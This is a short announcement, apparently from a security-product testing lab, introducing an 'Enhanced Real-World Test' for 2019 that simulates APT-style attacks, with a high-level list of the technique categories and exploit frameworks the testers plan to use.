New Test Introduction: Enhanced Real-World Test
New types of threats require new kinds of testing. Therefore, we are introducing a new test, where we use new and tailor-made attacks to compromise a victim. This “Enhanced Real-World Test” will be part of our Public Main Test Series of 2019, in both Consumer and Enterprise Test Series.
Advanced Persistent Threat (APT) is a term commonly used to describe cyber-threats that employ a complex, targeted, and effective attack to steal confidential information. Such attacks are very purposeful, and usually use highly specialized tools. The tools employed include heavily obfuscated malicious code, the malicious use of benign system tools, and non-file-based malicious code.
In our new, additional “Enhanced Real-World Test”, we will be using the latest hacking and penetration techniques that allow attackers to access external computer systems. These attacks can be broken down into Lockheed Martin’s cybersecurity kill chain, and seven distinct phases – each with unique IOCs (Indicators of Compromise) for the victims. The tests will use a subset of the TTP (Tactics, Techniques, Procedures) of the MITRE attack framework.
The following techniques are expected to be employed in the planned malicious attacks:
- Use of system programs, so as not to trigger signature-based detection
- Use of popular scripting languages (vba, vbs, bat, PowerShell) as well as compiled binaries
- Staged and unstaged malware
- Obfuscation and/or encryption of malicious code before execution (Base64, AES)
- Different C2 channels to connect to the attacker (HTTP, HTTPS, TCP)
- Use of known exploit frameworks (Metasploit Framework, Meterpreter, PowerShell Empire, Puppy, etc.).
The tests will take place over the year and results will be published in Q4 of 2019.